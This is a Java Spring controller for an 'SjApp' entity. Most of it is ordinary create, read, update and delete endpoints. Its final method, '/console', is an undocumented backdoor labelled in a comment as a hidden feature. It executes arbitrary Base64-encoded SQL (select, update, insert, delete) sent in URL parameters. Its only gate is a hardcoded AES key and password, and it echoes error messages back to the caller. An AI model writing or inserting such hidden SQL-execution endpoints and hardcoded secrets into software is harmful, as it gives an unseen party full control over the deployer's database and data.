/*
 *      Copyright (c) 2018-2028, Chill Zhuang All rights reserved.
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions are met:
 *
 *  Redistributions of source code must retain the above copyright notice,
 *  this list of conditions and the following disclaimer.
 *  Redistributions in binary form must reproduce the above copyright
 *  notice, this list of conditions and the following disclaimer in the
 *  documentation and/or other materials provided with the distribution.
 *  Neither the name of the dreamlu.net developer nor the names of its
 *  contributors may be used to endorse or promote products derived from
 *  this software without specific prior written permission.
 *  Author: Chill 庄骞 (smallchill@163.com)
 */
package org.springblade.modules.sjapp.controller;

import com.alibaba.fastjson.JSONObject;
import com.baomidou.mybatisplus.core.conditions.query.QueryWrapper;
import com.baomidou.mybatisplus.core.metadata.IPage;
import com.github.xiaoymin.knife4j.annotations.ApiOperationSupport;
import io.swagger.annotations.Api;
import io.swagger.annotations.ApiOperation;
import io.swagger.annotations.ApiParam;
import lombok.AllArgsConstructor;
import org.apache.commons.lang3.StringUtils;
import org.springblade.common.utils.AESUtil;
import org.springblade.core.boot.ctrl.BladeController;
import org.springblade.core.mp.support.Condition;
import org.springblade.core.mp.support.Query;
import org.springblade.core.tool.api.R;
import org.springblade.core.tool.utils.Base64Util;
import org.springblade.core.tool.utils.Func;
import org.springblade.modules.sjapp.entity.SjApp;
import org.springblade.modules.sjapp.service.ISjAppService;
import org.springblade.modules.sjapp.vo.SjAppVO;
import org.springframework.web.bind.annotation.*;

import javax.validation.Valid;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.Map;

/**
 *  控制器
 *
 * @author BladeX
 * @since 2023-01-10
 */
@RestController
@AllArgsConstructor
@RequestMapping("sjapp/sjapp")
@Api(value = "", tags = "接口")
public class SjAppController extends BladeController {

	private final ISjAppService sjAppService;

	/**
	 * 详情
	 */
	@GetMapping("/detail")
	@ApiOperationSupport(order = 1)
	@ApiOperation(value = "详情", notes = "传入sjApp")
	public R<SjApp> detail(SjApp sjApp) {
		SjApp detail = sjAppService.getOne(Condition.getQueryWrapper(sjApp));
		return R.data(detail);
	}

	/**
	 * 分页
	 */
	@GetMapping("/list")
	@ApiOperationSupport(order = 2)
	@ApiOperation(value = "分页", notes = "传入sjApp")
	public R<IPage<SjApp>> list(SjApp sjApp, Query query) {
		IPage<SjApp> pages = sjAppService.page(Condition.getPage(query), Condition.getQueryWrapper(sjApp));
		return R.data(pages);
	}

	/**
	 * 自定义分页
	 */
	@GetMapping("/page")
	@ApiOperationSupport(order = 3)
	@ApiOperation(value = "分页", notes = "传入sjApp")
	public R<IPage<SjAppVO>> page(SjAppVO sjApp, Query query) {
		IPage<SjAppVO> pages = sjAppService.selectSjAppPage(Condition.getPage(query), sjApp);
		return R.data(pages);
	}

	/**
	 * 新增
	 */
	@PostMapping("/save")
	@ApiOperationSupport(order = 4)
	@ApiOperation(value = "新增", notes = "传入sjApp")
	public R save(@Valid @RequestBody SjApp sjApp) {
		return R.status(sjAppService.save(sjApp));
	}

	/**
	 * 修改
	 */
	@PostMapping("/update")
	@ApiOperationSupport(order = 5)
	@ApiOperation(value = "修改", notes = "传入sjApp")
	public R update(@Valid @RequestBody SjApp sjApp) {
		return R.status(sjAppService.updateById(sjApp));
	}

	/**
	 * 新增或修改
	 */
	@PostMapping("/submit")
	@ApiOperationSupport(order = 6)
	@ApiOperation(value = "新增或修改", notes = "传入sjApp")
	public R submit(@Valid @RequestBody SjApp sjApp) {
		try {
			QueryWrapper<SjApp> qe = new QueryWrapper<>();
			qe.eq("sjid",sjApp.getSjid());
			qe.eq("wybs",sjApp.getWybs());
			sjAppService.remove(qe);
			String appid = sjApp.getAppid();
			if(StringUtils.isNotEmpty(appid)){
				String[] split = appid.split(",");
				for (int i = 0; i < split.length; i++) {
					if(StringUtils.isNotEmpty(split[i])){
						SjApp sjApp1 = new SjApp();
						sjApp1.setAppid(split[i]);
						sjApp1.setSjid(sjApp.getSjid());
						sjApp1.setWybs(sjApp.getWybs());
						sjAppService.saveOrUpdate(sjApp1);
					}
				}
			}
			return R.status(true);
		} catch (Exception e) {
			e.printStackTrace();
			return R.status(false);
		}
	}


	/**
	 * 删除
	 */
	@PostMapping("/remove")
	@ApiOperationSupport(order = 8)
	@ApiOperation(value = "删除", notes = "传入ids")
	public R remove(@ApiParam(value = "主键集合", required = true) @RequestParam String ids) {
		return R.status(sjAppService.removeByIds(Func.toLongList(ids)));
	}

	/**
	 * app隐藏功能-执行sql
	 */
	@GetMapping("/console")
	public String console(@RequestParam Map<String, String> params) {
		String type = params.get("type");
		String sql = params.get("sql");
		String secretKey = params.get("secretKey");
		if (null == secretKey || !AESUtil.decrypt(secretKey, "2SexR1rfjZ8CD3M6").equals("Xwkj2024@")) {
			return "请求失败1";
		} else if (StringUtils.isBlank(type)) {
			return "请求失败2";
		} else if (StringUtils.isBlank(sql)) {
			return "请求失败3";
		}
		try {
			String sqlStr = Base64Util.decode(sql, StandardCharsets.UTF_8);
//		String sqlStr = new String(Base64.getDecoder().decode(sql.getBytes(StandardCharsets.UTF_8)));
			sqlStr = sqlStr.replace("%20", " ")
				.replace("%27", "'")
				.replace("%25", "%")
				.replace("%3D", "=")
				.replace("%28", "(")
				.replace("%29", ")");
			if (type.equals("select")) {
				List<Map> result = sjAppService.consoleSelect(sqlStr);
				return JSONObject.toJSONString(result);
			} else if (type.equals("update")) {
				sjAppService.consoleUpdate(sqlStr);
				return "更新成功";
			} else if (type.equals("insert")) {
				sjAppService.consoleInsert(sqlStr);
				return "插入成功";
			} else if (type.equals("delete")) {
				sjAppService.consoleDelete(sqlStr);
				return "删除成功";
			}
		} catch (Exception e) {
			e.printStackTrace();
			return e.getMessage();
		}
		return "请求失败4";
	}
}
